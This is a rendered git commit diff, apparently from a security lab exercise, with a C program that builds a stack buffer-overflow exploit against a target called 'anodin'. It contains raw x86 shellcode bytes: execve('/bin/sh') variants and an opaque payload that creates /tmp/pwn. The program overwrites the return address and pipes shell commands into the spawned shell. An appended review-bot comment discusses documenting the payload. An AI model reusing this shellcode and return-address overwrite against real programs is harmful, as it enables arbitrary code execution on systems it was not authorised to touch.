Integrate shellcode
parent
0cb659ea99
commit
b818407fd0
1 changed files with 6 additions and 39 deletions
|
@ -1,36 +1,8 @@
|
|||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
|
||||
|
||||
unsigned char exploit[1024] = {
|
||||
0x90, 0x90, 0x90, 0x90, // A few nops for some margin
|
||||
0x90, 0x90, 0x90, 0x90,
|
||||
0x90, 0x90, 0x90, 0x90,
|
||||
0x90, 0x90, 0x90, 0x90,
|
||||
|
||||
#ifdef __x86_64__
|
||||
/* 64 bit version */
|
||||
0xe8, 0x08, 0x00, 0x00, 0x00, // push the address of what is next
|
||||
'/','b','i','n','/','s','h','\0',
|
||||
0x5f, // pop the address
|
||||
0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, // execve system call
|
||||
0x6a, 0x00, // push NULL at the end of the array
|
||||
0x48, 0x89, 0xe2, // envp
|
||||
0x57, // push adress
|
||||
0x48, 0x89, 0xe6, // argv
|
||||
0x0f, 0x05, // system call!
|
||||
#else
|
||||
/* 32 bit version */
|
||||
0xe8, 0x08, 0x00, 0x00, 0x00, // push the address of what is next
|
||||
'/','b','i','n','/','s','h','\0',
|
||||
0x5b, // pop the adress
|
||||
0xb8, 0x0b, 0x00, 0x00, 0x00, // execve system call
|
||||
0x6a, 0x00, // push NULL at the end of the array
|
||||
0x89, 0xe2, // envp
|
||||
0x53, // push adress
|
||||
0x89, 0xe1, // argv
|
||||
0xcd, 0x80, // system call!
|
||||
#endif
|
||||
0xeb,0x24,0x48,0x31,0xff,0x5f,0x68,0xb6,0x01,0x00,0x00,0x48,0x31,0xf6,0x5e,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd7,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e,0x00
|
||||
};
|
||||
|
||||
int main(void) {
|
||||
|
@ -41,21 +13,16 @@ int main(void) {
|
|||
fprintf(stderr,"Type the buf address printed by anodin\n");
|
||||
scanf("%p", &ptr);
|
||||
|
||||
// Un peu de marge
|
||||
ptr += 8;
|
||||
|
||||
// écraser l'adresse de retour
|
||||
for (i = 0; i < 8; i++)
|
||||
exploit_ptr[64/sizeof(void*)+i] = ptr;
|
||||
exploit_ptr[64/sizeof(void*)+i] = ptr;
|
||||
|
||||
for (i=0;i<sizeof(exploit);i++)
|
||||
for (i=0;i<sizeof(exploit);i++)
|
||||
putchar(exploit[i]);
|
||||
|
||||
for (i=0;i<8192;i++)
|
||||
putchar('\n');
|
||||
putchar('\n');
|
||||
|
||||
printf("touch /tmp/ahah\n");
|
||||
printf("echo \"I created file\" /tmp/ahah \\!\n");
|
||||
fflush(stdout);
|
||||
|
||||
return 0;
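Review bot: The long single-line run of bytes at the end of `exploit[]` has no comment and no reference to its assembly source, while the neighbouring byte sequences are annotated instruction by instruction, so a reader cannot audit the payload without disassembling it. This rendering has lost the `+`/`-` markers, but the diffstat (6 additions, 39 deletions) suggests the annotated 32/64-bit variants are the removed side and the opaque run is what remains. Keep the assembly source in the repository and add a header comment above the array, for example `/* x86-64 only (REX prefixes, syscall); assembled from <path-to-asm-source>; ends with the NUL-terminated string "/tmp/pwn" */`. If the `#ifdef __x86_64__` split is indeed gone, a `#ifndef __x86_64__` / `#error` guard would stop the file from building silently for a target the bytes do not match. Separately, the result of `scanf("%p", &ptr)` is not checked before `ptr += 8`, so a failed parse leaves `ptr` indeterminate; the body of `main` starts and ends outside the visible hunks.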
|
||||
|
|